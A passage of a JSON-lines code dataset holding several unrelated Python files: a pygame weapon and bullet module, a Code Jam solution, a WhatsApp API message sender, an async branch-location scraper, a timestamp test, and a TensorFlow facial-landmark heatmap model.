self.angle_degrees)\n self.entity.image = self.entity_image_rigth\n self.facing_r = True\n\n def update(self):\n \"\"\"\n Updates the weapon. In this basic weapon, it just rotates it acordingly\n to the target.\n\n Returns\n -------\n None\n \"\"\"\n self._get_angles()\n self._rotate()\n\nclass EnemyWeapon(Weapon):\n \"\"\"\n Class representing an enemy's weapon. It changes the rotation implementation\n so it doesn't flip the enemy's image.\n\n Parameters\n ----------\n image_path: tuple\n The path leading to the weapon image\n target_pos:\n The initial position to target.\n \"\"\"\n def _rotate(self):\n self.image = pygame.transform.rotate(self.orig_image, self.angle_degrees)\n\n self.rect = self.image.get_rect(\n center = (math.cos(-self.angle_radians) * 50 + self.entity.rect.centerx,\n math.sin(-self.angle_radians) * 60 + self.entity.rect.centery)\n )\n\n if -self.angle_degrees >= 90 or -self.angle_degrees <= -90:\n if self.facing_r:\n self.orig_image = pygame.transform.flip(self.orig_image, False, True)\n self.entity.image = self.entity.image_right\n self.facing_r = False\n\n elif not self.facing_r:\n self.orig_image = pygame.transform.flip(self.orig_image, False, True)\n self.entity.image = self.entity.image_left\n self.facing_r = True\n\nclass Gun(Weapon):\n \"\"\"\n Class representing a gun. A gun implements the same thing as weapons, with\n the addition of the capability of shooting. 
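_rotate above is plain circle geometry: the weapon sits at a fixed offset from its owner along the angle toward the target (65 and 80 are the offsets Weapon uses). The same trig in isolation:

import math

def orbit(cx, cy, tx, ty, rx=65, ry=80):
    # angle measured as in _get_angles: screen y grows downward
    angle = math.atan2(cy - ty, tx - cx)
    return (math.cos(-angle) * rx + cx,
            math.sin(-angle) * ry + cy)

print(orbit(0, 0, 100, 0))  # target directly to the right -> (65.0, 0.0)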
All the gun peculiaritys, like\n bullet damage and speed, are set with the dict `stats`.\n\n Parameters\n ----------\n image_path: tuple\n The path leading to the weapon image\n target_pos: tuple\n The initial position to target.\n stats: dict\n A dicitionary containing the gun stats.\n \"\"\"\n def __init__(self, image_path, target_pos, stats):\n super().__init__(image_path, target_pos)\n self.move_function = stats[\"move_function\"]\n self.damage = stats[\"damage\"]\n self.mag_size = stats[\"mag_size\"]\n self.reload_cooldown = stats[\"reload_cooldown\"]\n self.bullet_speed = stats[\"bullet_speed\"]\n self.bullet_sprite = stats[\"bullet_sprite\"]\n\n self.bullet_group = pygame.sprite.Group()\n\n self.shooting = False\n self.reloading = False\n\n self.mag_count = self.mag_size\n self.time_empty_mag = 0\n self.time_last_reload = 0\n self.time_now = 0\n\n def shoot(self):\n \"\"\"\n Make the gun shoot. This will create bullets and store them in the\n `bullet_group`. If the gun is in cooldown, it'll do nothing. If a shoot\n is still occuring, it'll do nothing too.\n\n Returns\n -------\n None\n \"\"\"\n if not self.shooting:\n self.shooting = True\n self._shoot()\n\n def _shoot(self):\n if self.mag_count > 0:\n self.shooting = True\n self.mag_count -= 1\n bullet = Bullet(\n self.bullet_sprite,\n (self.rect.centerx, self.rect.centery),\n self.angle_radians,\n self.damage,\n self.move_function,\n self.bullet_speed\n )\n self.bullet_group.add(bullet)\n if self.mag_count == 0:\n self.shooting = False\n self.time_empty_mag = self.time_now\n SHOOT_SOUND.play()\n\n def _reload(self):\n self.mag_count = self.mag_size\n self.reloading = False\n\n def update(self):\n \"\"\"\n Updates the weapon. Besides rotating the weapon, this method also will\n call tue update method to the gun active bullets.\n\n Returns\n -------\n None\n \"\"\"\n super().update()\n self.time_now = pygame.time.get_ticks()\n\n if self.mag_count == 0:\n if self.time_now - self.time_empty_mag > self.reload_cooldown:\n self.reloading = True\n\n if self.reloading:\n self._reload()\n if self.shooting:\n self._shoot()\n self.bullet_group.update()\n\nclass EnemyGun(EnemyWeapon, Gun):\n pass\n\nclass Bullet(pygame.sprite.Sprite):\n \"\"\"\n Class representing a bullet. The class is the same for enemies and the\n player. The bullets needs some parameters, including the trajectory function,\n to determine damages and such. What should be used to diferentiate from\n where the bullet comes from is the group it is contained.\n\n Parameters\n ----------\n image_path: tuple\n The path to the bullet image.\n position: tuple\n The initial position of the bullet.\n angle_radians: float\n The angle that the bullet is being shoot.\n damage: int\n The damage the bullet should.\n move_function: function\n A function to determine the bullet trajectory. 
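A stats dict wired the way Gun.__init__ reads it — the keys are exactly the ones the class consumes, while the values and sprite path here are purely illustrative:

import math

pistol_stats = {
    'move_function': lambda t: 0,              # straight flight; try 3 * math.sin(t) for a wave
    'damage': 10,
    'mag_size': 7,
    'reload_cooldown': 1500,                   # ms, compared against pygame.time.get_ticks()
    'bullet_speed': 4,
    'bullet_sprite': ('assets', 'bullet.png'), # hypothetical path tuple
}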
This function should take\n one variable (the time elapsed since the bullet was shoot) and should\n return only a float or int.\n speed: int\n The speed of the bullet\n \"\"\"\n def __init__(self, image_path: tuple, position: tuple, angle_radians: float, damage: int, move_function: FunctionType, speed: int):\n pygame.sprite.Sprite.__init__(self)\n self.image = load_image(image_path)\n self.orig_image = self.image\n self.rect = self.image.get_rect()\n self.rect.center = position\n self.damage = damage\n self.dx = 50\n self.dy = 0\n self.x = position[0]\n self.y = position[1]\n self.angle_r = -angle_radians\n self.image = pygame.transform.rotate(\n self.orig_image,\n math.degrees(angle_radians)\n )\n self.travel_time = 0\n self.function = move_function\n self.speed = speed\n\n def update(self):\n \"\"\"\n Updates the bullet. This will make it go futher, acordingly to the\n trajectory function passed. This ins't made for being called alone, but\n to be called when the bullet group is being updated.\n\n Returns\n -------\n None\n \"\"\"\n self.new_x = self.dx * math.cos(self.angle_r) - self.dy * math.sin(self.angle_r) + self.x\n self.new_y = self.dx * math.sin(self.angle_r) + self.dy * math.cos(self.angle_r) + self.y\n self.rect.centerx = self.new_x\n self.rect.centery = self.new_y\n \n wave = self.function(self.travel_time)\n self.travel_time += 0.5\n self.dx += self.speed\n self.dy += wave\n\n if self.travel_time > 100:\n self.kill()\n","repo_name":"vito0182/trabalho-lp-a2","sub_path":"src/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23416621121","text":"import sys, string\r\n\r\ndef magician(row1, row2):\r\n s1 = set(row1)\r\n s2 = set(row2)\r\n s = s1 & s2\r\n if len(s) > 1:\r\n return \"Bad magician!\"\r\n if len(s) == 0:\r\n return \"Volunteer cheated!\"\r\n return s.pop()\r\n\r\ndef main(args):\r\n f = file(args[1])\r\n ncases = int(f.readline())\r\n for i in range(ncases):\r\n line = f.readline()\r\n line = line.rstrip()\r\n nrow = int(line)\r\n for j in range(4):\r\n line = f.readline()\r\n if j+1 == nrow:\r\n line = line.rstrip()\r\n row1 = map(int, line.split(\" \"))\r\n line = f.readline()\r\n line = line.rstrip()\r\n nrow = int(line)\r\n for j in range(4):\r\n line = f.readline()\r\n if j+1 == nrow:\r\n line = line.rstrip()\r\n row2 = map(int, line.split(\" \"))\r\n ans = magician(row1, row2)\r\n sys.stdout.write(\"Case #%d: %s\\n\" % (i+1, ans))\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3393.py","file_name":"3393.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20704173075","text":"import requests\n\nclass SendMessage:\n def __init__(self,phone:str,id_whats:str ,acces_token: str) -> None:\n self.head = {\n \"Authorization\":f\"Bearer {acces_token}\"\n }\n self.url = f\"https://graph.facebook.com/v14.0/{id_whats}/messages/\"\n self.phone = phone\n\n\n def template(self,json_components: dict):\n json_template = {\n \"messaging_product\": \"whatsapp\",\n \"to\": f\"51{self.phone}\",\n \"type\": \"template\",\n \"template\": json_components\n }\n return requests.post(self.url, headers=self.head, json=json_template).json()\n \n def message_text(self,text:str):\n json_message ={\n 'messaging_product': 'whatsapp',\n 'to':f\"51{self.phone}\",\n 
'type':'text',\n 'text':{\"body\":text} \n }\n return requests.post(self.url, headers=self.head, json=json_message).json()\n \n","repo_name":"digitaliatec/send_notification","sub_path":"whatsapp_api/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31832089630","text":"import json\nimport aiohttp\nimport asyncio\nfrom geopy.geocoders import Nominatim\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_location(address):\n geolocator = Nominatim(user_agent=\"my_request\")\n location = geolocator.geocode(address)\n try:\n lat = location.latitude\n long = location.longitude\n if lat and long:\n return lat, long\n except AttributeError:\n print(f'{address} not found')\n return None\n\n\ndef get_info():\n response_from_main_page = requests.get(\n 'https://oriencoop.cl/sucursales.htm'\n )\n data = response_from_main_page.text\n soup = BeautifulSoup(data, 'lxml')\n common_phones = [\n phone.text for phone in soup.find(\n 'div', class_='b-call shadow'\n ).findAll('a', href=True) if phone.text\n ]\n c_list_accordion_class = soup.findAll('ul', class_='sub-menu')\n list_of_ul = []\n for i in c_list_accordion_class:\n list_of_ul.append(i.findAllNext('a', href=True))\n list_of_branches = [\n a['href'][12:] for a in list_of_ul[0] if '/sucursales/' in a['href']\n ]\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n task = loop.create_task(main(list_of_branches, common_phones))\n async_result = loop.run_until_complete(task)\n return async_result\n\n\nasync def create_one_task(session, branch, common_phones):\n async with session.get(\n f'https://oriencoop.cl/sucursales/{int(branch)}', ssl=False\n ) as response_from_branch:\n data_branch = response_from_branch\n soup_branch = BeautifulSoup(await data_branch.text(), 'lxml')\n s_dato_info = soup_branch.find('div', class_=\"s-dato\").findAll('span')\n address = s_dato_info[0].text\n branch_phone = [s_dato_info[1].text]\n for common_phone in common_phones:\n branch_phone.append(common_phone)\n working_hours = s_dato_info[3].text[1:], s_dato_info[4].text.strip()\n name = [img['alt'] for img in soup_branch.find(\n 'div', class_='b-logo'\n ).find_all('img', alt=True)][0]\n location = get_location(address)\n data = {\n 'address': address,\n 'latlon': location,\n 'name': name,\n 'phones': branch_phone,\n 'working_hours': working_hours\n }\n return data\n\n\nasync def get_all_tasks(session, list_of_branches, common_phones):\n tasks = []\n for branch in list_of_branches:\n task = asyncio.create_task(\n create_one_task(session, branch, common_phones)\n )\n tasks.append(task)\n results = await asyncio.gather(*tasks)\n return results\n\n\nasync def main(list_of_branches, common_phones):\n async with aiohttp.ClientSession(trust_env=True) as session:\n response = await get_all_tasks(\n session, list_of_branches, common_phones\n )\n json_data = json.dumps(response, ensure_ascii=False)\n with open('sucursales_branches.json', 'w') as file:\n file.write(json_data)\n\n\nif __name__ == '__main__':\n get_info()\n","repo_name":"droslik/locations","sub_path":"async_sucusales.py","file_name":"async_sucusales.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36592165805","text":"import sys\nsys.path.append(\"..\")\nimport struct\nimport unittest\nfrom libljlt import Helpers\n\n\nclass 
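# A minimal sketch of the fan-out pattern the scraper above uses: one shared
# aiohttp session, one task per page, gathered concurrently. The URLs here are
# placeholders, not the real endpoints:
import asyncio
import aiohttp

async def fetch(session, url):
    async with session.get(url) as resp:
        return await resp.text()

async def fetch_all(urls):
    async with aiohttp.ClientSession() as session:
        tasks = [asyncio.create_task(fetch(session, u)) for u in urls]
        return await asyncio.gather(*tasks)

# pages = asyncio.run(fetch_all(["https://example.com/a", "https://example.com/b"]))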
DateTimeFunctionTests(unittest.TestCase):\n def test_to_string(self):\n raw_timestamp = b\"\\xBF\\x8B\\x9A\\x52\\x96\\xCE\\xCE\\x01\"\n u64_int = struct.unpack(\" 0.), p_texture=p_texture,\n augment_geom=(augment_geom and artistic_start == 0 and p_geom > 0.), p_geom=p_geom,\n verbose=menpo_verbose)\n\n if mode == 'TRAIN':\n\n train_params = locals()\n print_training_params_to_file(train_params) # save init parameters\n\n self.train_inds = np.arange(len(self.img_menpo_list))\n\n if self.debug:\n self.train_inds = self.train_inds[:self.debug_data_size]\n self.img_menpo_list = self.img_menpo_list[self.train_inds]\n\n if valid_size > 0:\n\n self.valid_bb_dictionary = load_bb_dictionary(self.bb_dir, 'TEST', test_data=self.valid_data)\n self.valid_img_menpo_list = load_menpo_image_list(\n img_path, train_crop_dir, self.img_dir_ns, 'TEST', bb_dictionary=self.valid_bb_dictionary,\n image_size=self.image_size, margin=margin, bb_type=bb_type, test_data=self.valid_data,\n verbose=menpo_verbose)\n\n np.random.seed(0)\n self.val_inds = np.arange(len(self.valid_img_menpo_list))\n np.random.shuffle(self.val_inds)\n self.val_inds = self.val_inds[:self.valid_size]\n\n self.valid_img_menpo_list = self.valid_img_menpo_list[self.val_inds]\n\n if self.approx_maps_cpu:\n self.valid_images_loaded, self.valid_gt_maps_loaded, self.valid_landmarks_loaded =\\\n load_images_landmarks_approx_maps(\n self.valid_img_menpo_list, np.arange(self.valid_size), primary=True, image_size=self.image_size,\n num_landmarks=self.num_landmarks, c_dim=self.c_dim, scale=self.scale, win_mult=self.win_mult,\n sigma=self.sigma, save_landmarks=True)\n else:\n self.valid_images_loaded, self.valid_gt_maps_loaded, self.valid_landmarks_loaded =\\\n load_images_landmarks_maps(\n self.valid_img_menpo_list, np.arange(self.valid_size), primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=True)\n\n if self.allocate_once:\n self.valid_landmarks_pred = np.zeros([self.valid_size, self.num_landmarks, 2]).astype('float32')\n\n if self.valid_size > self.sample_grid:\n self.valid_gt_maps_loaded = self.valid_gt_maps_loaded[:self.sample_grid]\n else:\n self.val_inds = None\n\n self.epoch_inds_shuffle = train_val_shuffle_inds_per_epoch(\n self.val_inds, self.train_inds, train_iter, batch_size, save_log_path)\n\n def add_placeholders(self):\n\n if self.mode == 'TEST':\n self.images = tf.placeholder(\n tf.float32, [None, self.image_size, self.image_size, self.c_dim], 'images')\n\n self.heatmaps_small = tf.placeholder(\n tf.float32, [None, int(self.image_size/4), int(self.image_size/4), self.num_landmarks], 'heatmaps_small')\n self.lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'lms_small')\n self.pred_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'pred_lms_small')\n\n elif self.mode == 'TRAIN':\n self.images = tf.placeholder(\n tf.float32, [None, self.image_size, self.image_size, self.c_dim], 'train_images')\n\n self.heatmaps_small = tf.placeholder(\n tf.float32, [None, int(self.image_size/4), int(self.image_size/4), self.num_landmarks], 'train_heatmaps_small')\n\n self.train_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'train_lms_small')\n self.train_pred_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'train_pred_lms_small')\n\n self.valid_lms_small = tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'valid_lms_small')\n self.valid_pred_lms_small = 
tf.placeholder(tf.float32, [None, self.num_landmarks, 2], 'valid_pred_lms_small')\n\n self.p_texture_log = tf.placeholder(tf.float32, [])\n self.p_geom_log = tf.placeholder(tf.float32, [])\n\n self.sparse_hm_small = tf.placeholder(tf.float32, [None, int(self.image_size/4), int(self.image_size/4), 1])\n\n if self.sample_to_log:\n row = int(np.sqrt(self.sample_grid))\n self.log_image_map = tf.placeholder(\n tf.uint8, [None,row * int(self.image_size/4), 3 * row *int(self.image_size/4), self.c_dim], 'sample_img_map')\n if self.sample_per_channel:\n row = np.ceil(np.sqrt(self.num_landmarks)).astype(np.int64)\n self.log_map_channels = tf.placeholder(\n tf.uint8, [None, row * int(self.image_size/4), 2 * row * int(self.image_size/4), self.c_dim],\n 'sample_map_channels')\n\n def heatmaps_network(self, input_images, reuse=None, name='pred_heatmaps'):\n\n with tf.name_scope(name):\n\n if self.weight_initializer == 'xavier':\n weight_initializer = contrib.layers.xavier_initializer()\n else:\n weight_initializer = tf.random_normal_initializer(stddev=self.weight_initializer_std)\n\n bias_init = tf.constant_initializer(self.bias_initializer)\n\n with tf.variable_scope('heatmaps_network'):\n with tf.name_scope('primary_net'):\n\n l1 = conv_relu_pool(input_images, 5, 128, conv_ker_init=weight_initializer, conv_bias_init=bias_init,\n reuse=reuse, var_scope='conv_1')\n l2 = conv_relu_pool(l1, 5, 128, conv_ker_init=weight_initializer, conv_bias_init=bias_init,\n reuse=reuse, var_scope='conv_2')\n l3 = conv_relu(l2, 5, 128, conv_ker_init=weight_initializer, conv_bias_init=bias_init,\n reuse=reuse, var_scope='conv_3')\n\n l4_1 = conv_relu(l3, 3, 128, conv_dilation=1, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_1')\n l4_2 = conv_relu(l3, 3, 128, conv_dilation=2, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_2')\n l4_3 = conv_relu(l3, 3, 128, conv_dilation=3, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_3')\n l4_4 = conv_relu(l3, 3, 128, conv_dilation=4, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_4_4')\n\n l4 = tf.concat([l4_1, l4_2, l4_3, l4_4], 3, name='conv_4')\n\n l5_1 = conv_relu(l4, 3, 256, conv_dilation=1, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_1')\n l5_2 = conv_relu(l4, 3, 256, conv_dilation=2, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_2')\n l5_3 = conv_relu(l4, 3, 256, conv_dilation=3, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_3')\n l5_4 = conv_relu(l4, 3, 256, conv_dilation=4, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_5_4')\n\n l5 = tf.concat([l5_1, l5_2, l5_3, l5_4], 3, name='conv_5')\n\n l6 = conv_relu(l5, 1, 512, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_6')\n l7 = conv_relu(l6, 1, 256, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_7')\n primary_out = conv(l7, 1, self.num_landmarks, conv_ker_init=weight_initializer,\n conv_bias_init=bias_init, reuse=reuse, var_scope='conv_8')\n\n self.all_layers = [l1, l2, l3, l4, l5, l6, l7, primary_out]\n\n return primary_out\n\n def build_model(self):\n self.pred_hm_p = self.heatmaps_network(self.images,name='heatmaps_prediction')\n\n def build_hm_generator(self): # TODO: remove\n 
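# The primary net above widens its receptive field by running four parallel 3x3
# convolutions with dilation rates 1-4 and concatenating them channel-wise
# (the conv_4_* and conv_5_* branches). A sketch of that block, assuming
# tf.keras rather than the repo's conv_relu helpers:
import tensorflow as tf

def dilated_block(x, filters=128):
    branches = [
        tf.keras.layers.Conv2D(filters, 3, dilation_rate=d, padding="same",
                               activation="relu")(x)
        for d in (1, 2, 3, 4)
    ]
    return tf.keras.layers.Concatenate(axis=-1)(branches)  # 4 * filters channels out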
# generate heat-maps using:\n # a sparse base (matrix of zeros with 1's in landmark locations) and convolving with a gaussian filter\n print (\"*** using convolution to create heat-maps. use this option only with GPU support ***\")\n\n # create gaussian filter\n win_small = int(self.win_mult * self.sigma)\n x_small, y_small = np.mgrid[0:2*win_small+1, 0:2*win_small+1]\n\n gauss_small = (8. / 3) * self.sigma * gaussian(x_small, y_small, win_small, win_small, sigma=self.sigma)\n gauss_small = tf.constant(gauss_small, tf.float32)\n gauss_small = tf.reshape(gauss_small, [2 * win_small + 1, 2 * win_small + 1, 1, 1])\n\n # convolve sparse map with gaussian\n self.filt_hm_small = tf.nn.conv2d(self.sparse_hm_small, gauss_small, strides=[1, 1, 1, 1], padding='SAME')\n self.filt_hm_small = tf.transpose(\n tf.concat(tf.split(self.filt_hm_small, self.batch_size, axis=0), 3), [3, 1, 2, 0])\n\n def create_loss_ops(self): # TODO: calculate NME on resized maps to 256\n\n def l2_loss_norm_eyes(pred_landmarks, real_landmarks, normalize=True, name='NME'):\n\n with tf.name_scope(name):\n with tf.name_scope('real_pred_landmarks_rmse'):\n landmarks_rms_err = tf.reduce_mean(\n tf.sqrt(tf.reduce_sum(tf.square(pred_landmarks - real_landmarks), axis=2)), axis=1)\n if normalize:\n with tf.name_scope('inter_pupil_dist'):\n with tf.name_scope('left_eye_center'):\n p1 = tf.reduce_mean(tf.slice(real_landmarks, [0, 42, 0], [-1, 6, 2]), axis=1)\n with tf.name_scope('right_eye_center'):\n p2 = tf.reduce_mean(tf.slice(real_landmarks, [0, 36, 0], [-1, 6, 2]), axis=1)\n\n eye_dist = tf.sqrt(tf.reduce_sum(tf.square(p1 - p2), axis=1))\n\n return landmarks_rms_err / eye_dist\n else:\n return landmarks_rms_err\n\n if self.mode is 'TRAIN':\n primary_maps_diff = self.pred_hm_p-self.heatmaps_small\n self.total_loss = 1000.*tf.reduce_mean(tf.square(primary_maps_diff))\n\n # add weight decay\n self.total_loss += self.reg * tf.add_n(\n [tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name])\n\n if self.compute_nme:\n self.nme_loss = tf.reduce_mean(l2_loss_norm_eyes(self.train_pred_lms_small,self.train_lms_small))\n\n if self.valid_size > 0 and self.compute_nme:\n self.valid_nme_loss = tf.reduce_mean(l2_loss_norm_eyes(self.valid_pred_lms_small,self.valid_lms_small))\n\n elif self.mode == 'TEST' and self.compute_nme:\n self.nme_per_image = l2_loss_norm_eyes(self.pred_lms_small, self.lms_small)\n self.nme_loss = tf.reduce_mean(self.nme_per_image)\n\n def predict_landmarks_in_batches(self, image_paths, session):\n\n num_batches = int(1.*len(image_paths)/self.batch_size)\n if num_batches == 0:\n batch_size = len(image_paths)\n num_batches = 1\n else:\n batch_size = self.batch_size\n\n img_inds = np.arange(len(image_paths))\n for j in range(num_batches):\n batch_inds = img_inds[j * batch_size:(j + 1) * batch_size]\n\n batch_images, _, batch_lms_small = \\\n load_images_landmarks_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n if j == 0:\n all_pred_landmarks = batch_pred_landmarks.copy()\n all_gt_landmarks = batch_lms_small.copy()\n else:\n all_pred_landmarks = 
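# l2_loss_norm_eyes above is the normalized mean error (NME): the mean
# per-landmark Euclidean distance divided by the inter-pupil distance, with eye
# centers taken as the means of points 36-41 and 42-47 of the 68-point
# convention. A numpy sketch of the same metric for one face ([68, 2] arrays):
import numpy as np

def nme(pred, gt):
    per_landmark = np.sqrt(((pred - gt) ** 2).sum(axis=1)).mean()
    right_eye = gt[36:42].mean(axis=0)
    left_eye = gt[42:48].mean(axis=0)
    return per_landmark / np.linalg.norm(left_eye - right_eye)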
np.concatenate((all_pred_landmarks,batch_pred_landmarks),0)\n all_gt_landmarks = np.concatenate((all_gt_landmarks, batch_lms_small), 0)\n\n reminder = len(image_paths)-num_batches*batch_size\n\n if reminder > 0:\n reminder_inds = img_inds[-reminder:]\n\n batch_images, _, batch_lms_small = \\\n load_images_landmarks_maps(\n self.img_menpo_list, reminder_inds, primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=self.compute_nme)\n\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=reminder, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n all_pred_landmarks = np.concatenate((all_pred_landmarks, batch_pred_landmarks), 0)\n all_gt_landmarks = np.concatenate((all_gt_landmarks, batch_lms_small), 0)\n\n return all_pred_landmarks, all_gt_landmarks\n\n def predict_landmarks_in_batches_loaded(self, images, session):\n\n num_images = int(images.shape[0])\n num_batches = int(1.*num_images/self.batch_size)\n if num_batches == 0:\n batch_size = num_images\n num_batches = 1\n else:\n batch_size = self.batch_size\n\n for j in range(num_batches):\n\n batch_images = images[j * batch_size:(j + 1) * batch_size,:,:,:]\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n if self.allocate_once:\n batch_heat_maps_to_landmarks_alloc_once(\n batch_maps=batch_maps_small_pred,\n batch_landmarks=self.valid_landmarks_pred[j * batch_size:(j + 1) * batch_size, :, :],\n batch_size=batch_size, image_size=int(self.image_size/4), num_landmarks=self.num_landmarks)\n else:\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=batch_size, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n if j == 0:\n all_pred_landmarks = batch_pred_landmarks.copy()\n else:\n all_pred_landmarks = np.concatenate((all_pred_landmarks, batch_pred_landmarks), 0)\n\n reminder = num_images-num_batches*batch_size\n if reminder > 0:\n\n batch_images = images[-reminder:, :, :, :]\n batch_maps_small_pred = session.run(self.pred_hm_p, {self.images: batch_images})\n if self.allocate_once:\n batch_heat_maps_to_landmarks_alloc_once(\n batch_maps=batch_maps_small_pred,\n batch_landmarks=self.valid_landmarks_pred[-reminder:, :, :],\n batch_size=reminder, image_size=int(self.image_size/4), num_landmarks=self.num_landmarks)\n else:\n batch_pred_landmarks = batch_heat_maps_to_landmarks(\n batch_maps_small_pred, batch_size=reminder, image_size=int(self.image_size/4),\n num_landmarks=self.num_landmarks)\n\n all_pred_landmarks = np.concatenate((all_pred_landmarks, batch_pred_landmarks), 0)\n\n if not self.allocate_once:\n return all_pred_landmarks\n\n def create_summary_ops(self):\n\n self.batch_summary_op = tf.summary.scalar('l_total', self.total_loss)\n\n if self.compute_nme:\n l_nme = tf.summary.scalar('l_nme', self.nme_loss)\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, l_nme])\n\n if self.log_histograms:\n var_summary = [tf.summary.histogram(var.name, var) for var in tf.trainable_variables()]\n grads = tf.gradients(self.total_loss, tf.trainable_variables())\n grads = list(zip(grads, tf.trainable_variables()))\n grad_summary = [tf.summary.histogram(var.name + '/grads', grad) for grad, var in grads]\n activ_summary = [tf.summary.histogram(layer.name, layer) for layer in self.all_layers]\n self.batch_summary_op 
= tf.summary.merge([self.batch_summary_op, var_summary, grad_summary, activ_summary])\n\n if self.augment_texture and self.log_artistic_augmentation_probs:\n p_texture_summary = tf.summary.scalar('p_texture', self.p_texture_log)\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, p_texture_summary])\n\n if self.augment_geom and self.log_artistic_augmentation_probs:\n p_geom_summary = tf.summary.scalar('p_geom', self.p_geom_log)\n self.batch_summary_op = tf.summary.merge([self.batch_summary_op, p_geom_summary])\n\n if self.valid_size > 0 and self.compute_nme:\n self.valid_summary = tf.summary.scalar('valid_l_nme', self.valid_nme_loss)\n\n if self.sample_to_log:\n img_map_summary =tf.summary.image('compare_map_to_gt',self.log_image_map)\n if self.sample_per_channel:\n map_channels_summary = tf.summary.image('compare_map_channels_to_gt', self.log_map_channels)\n self.img_summary = tf.summary.merge([img_map_summary, map_channels_summary])\n else:\n self.img_summary = img_map_summary\n if self.valid_size >= self.sample_grid:\n img_map_summary_valid = tf.summary.image('compare_map_to_gt_valid', self.log_image_map)\n if self.sample_per_channel:\n map_channels_summary_valid = tf.summary.image('compare_map_channels_to_gt_valid', self.log_map_channels)\n self.img_summary_valid = tf.summary.merge([img_map_summary_valid, map_channels_summary_valid])\n else:\n self.img_summary_valid = img_map_summary_valid\n\n def eval(self):\n\n self.add_placeholders()\n # build model\n self.build_model()\n self.create_loss_ops()\n\n if self.debug:\n self.img_menpo_list = self.img_menpo_list[:np.min([self.debug_data_size, len(self.img_menpo_list)])]\n\n num_images = len(self.img_menpo_list)\n img_inds = np.arange(num_images)\n\n sample_iter = np.ceil(1. * num_images / self.sample_grid).astype('int')\n\n with tf.Session(config=self.config) as sess:\n\n # load trained parameters\n print ('loading test model...')\n saver = tf.train.Saver()\n saver.restore(sess, self.test_model_path)\n\n _, model_name = os.path.split(self.test_model_path)\n\n gt_provided = self.img_menpo_list[0].has_landmarks # check if GT landmarks provided\n\n for i in range(sample_iter):\n\n batch_inds = img_inds[i * self.sample_grid:(i + 1) * self.sample_grid]\n\n if not gt_provided:\n batch_images = load_images(self.img_menpo_list, batch_inds, image_size=self.image_size,\n c_dim=self.c_dim, scale=self.scale)\n\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n\n batch_maps_gt = None\n else:\n # TODO: add option for approx maps + allocate once\n batch_images, batch_maps_gt, _ = \\\n load_images_landmarks_maps(\n self.img_menpo_list, batch_inds, primary=True, image_size=self.image_size,\n c_dim=self.c_dim, num_landmarks=self.num_landmarks, scale=self.scale, sigma=self.sigma,\n save_landmarks=False)\n\n batch_maps_small_pred = sess.run(self.pred_hm_p, {self.images: batch_images})\n\n sample_path_imgs = os.path.join(\n self.save_sample_path, model_name +'-'+ self.test_data+'-sample-%d-to-%d-1.png' % (\n i * self.sample_grid, (i + 1) * self.sample_grid))\n\n merged_img = merge_images_landmarks_maps_gt(\n batch_images.copy(), batch_maps_small_pred, batch_maps_gt, image_size=self.image_size,\n num_landmarks=self.num_landmarks, num_samples=self.sample_grid, scale=self.scale, circle_size=0,\n fast=self.fast_img_gen)\n\n scipy.misc.imsave(sample_path_imgs, merged_img)\n\n if 